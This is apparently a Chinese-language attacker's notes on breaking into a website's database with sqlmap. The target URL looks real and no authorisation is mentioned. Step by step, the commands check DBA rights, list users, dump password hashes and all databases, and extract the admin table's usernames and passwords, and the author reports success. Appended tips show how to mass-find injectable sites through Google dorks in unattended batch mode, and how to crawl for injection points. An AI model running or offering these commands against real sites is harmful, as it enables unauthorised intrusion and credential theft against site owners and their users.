1.sqlmap -u http://www.1234.net/product.asp?sid=53 获取基本信息,对注入点进行初步的判断和检测
已经判断出目标的系统和数据库类型。
2.sqlmap -u http://www.1234.net/product.asp?sid=53 --is-dba -v 1 判断数据库使用者是否DBA。
可以看出是DBA。
3. sqlmap -u http://www.1234.net/product.asp?sid=53 --users -v 0 列举数据库用户(是否SA)。
sqlmap -u http://www.1234.net/product.asp?sid=53 --passwords -v 0 获取数据库密码。
sqlmap -u http://www.1234.net/product.asp?sid=53 --privileges -v 0 判断当前权限。
sqlmap -u http://www.1234.net/product.asp?sid=53 --dbs -v 0 列出所有数据库。
sqlmap -u http://www.1234.net/product.asp?sid=53 --dump-all -v 0 导出所有库。
kali上的sqlmap出错了,换BT5继续
4. ./sqlmap.py -u http://www.1234.net/product.asp?sid=53 --tables (--current-db) 获取当前数据库
中的表(-D 指定数据库)
得到4个表。
5../sqlmap.py -u http://www.1234.net/product.asp?sid=53 --columns -T admin -v 2 获取指定数据库(-D 指定数据库)
中指定表的字段
6.python sqlmap.py -u http://www.1234.net/product.asp?sid=53 --dump -T admin -C"username,password"
获取指定数据库名中指定表中指定字段的数据
成功得到admin密码。
____________________________________________________________________________________________________________
摘抄:
1.如何高效率使用 google 搜索注入点:
sudo python sqlmap.py -g inurl:php?id=13 --smart --threads=10 --batch
稍作解释:
--smart 规定只是粗略判断是否可注入,而不详细检测(否则会慢死)
--batch 规定不与用户进行任何交互(这样你就可以一边看片片一边跑注入)
PS:说实话,sqlmap 用 google 搜注入点的功能真的不如啊 D,明小子
2.如何用 sqlmap 实现爬行页面搜索注入点
sudo sqlmap.py -u "www.xxx.com/view.php?id=13" --crawl=3
--crawl 指定爬行深度
3.模拟智能手机
sudo sqlmap.py -u "www.xxx.com/view.php?id=13" --mobile
4.盲注时智能预测表名字段名
sudo sqlmap.py -u "www.xxx.com/view.php?id=13" --predict-output